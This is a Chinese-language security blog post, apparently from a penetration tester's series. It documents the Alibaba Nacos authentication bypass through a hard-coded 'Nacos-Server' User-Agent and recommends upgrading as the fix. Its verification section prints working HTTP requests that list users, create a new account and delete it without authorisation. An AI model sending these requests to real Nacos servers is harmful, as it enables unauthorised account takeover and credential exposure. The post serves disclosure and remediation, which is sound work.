前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Alibaba Nacos 权限认证绕过漏洞

Alibaba Nacos 权限认证绕过漏洞

作者头像
LuckySec
发布2022-11-08 15:15:02
1.6K0
发布2022-11-08 15:15:02
举报
文章被收录于专栏:LuckySec网络安全

前言

持续更新:整理下渗透测试工作中发现过的漏洞(包含漏洞描述、漏洞等级、漏洞验证、修复建议),这里不深究漏洞产生的各种后利用或者绕过方式,漏洞验证过程不局限于文章中的方法,能够证明漏洞存在即可。

0x01 漏洞描述

- Alibaba Nacos 权限认证绕过 -

Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

该漏洞发生在Nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。

  • 影响版本: Alibaba Nacos <= 2.0.0-ALPHA.1

0x02 漏洞等级

威胁级别

高危

中危

低危

0x03 漏洞验证

访问Nacos系统界面,使用BurpSuite工具抓取数据包。

修改请求包中的User-Agent的值为Nacos-Server,再访问/nacos/v1/auth/users?pageNo=1&pageSize=9可以获取已有的用户列表。

代码语言:javascript
复制
GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
Host: www.luckysec.cn:8848
User-Agent: Nacos-Server

使用POST方式访问/nacos/v1/auth/users新建一个新账号luckysec

代码语言:javascript
复制
POST /nacos/v1/auth/users HTTP/1.1
Host: www.luckysec.cn:8848
User-Agent: Nacos-Server
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

username=luckysec&password=123456

返回登录界面,使用新建的账号登录成功。

漏洞验证完成后,可以访问/nacos/v1/auth/users?username=luckysec,将HTTP方法改为DELETE,即可未授权删除刚刚创建的账号luckysec。

代码语言:javascript
复制
DELETE /nacos/v1/auth/users?username=luckysec HTTP/1.1
Host: www.luckysec.cn:8848
User-Agent: Nacos-Server

0x04 漏洞修复

  1. 升级Nacos版本至最新版本。
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022-10-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 0x01 漏洞描述
  • 0x02 漏洞等级
  • 0x03 漏洞验证
  • 0x04 漏洞修复
相关产品与服务
访问管理
访问管理(Cloud Access Management,CAM)可以帮助您安全、便捷地管理对腾讯云服务和资源的访问。您可以使用CAM创建子用户、用户组和角色,并通过策略控制其访问范围。CAM支持用户和角色SSO能力,您可以根据具体管理场景针对性设置企业内用户和腾讯云的互通能力。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档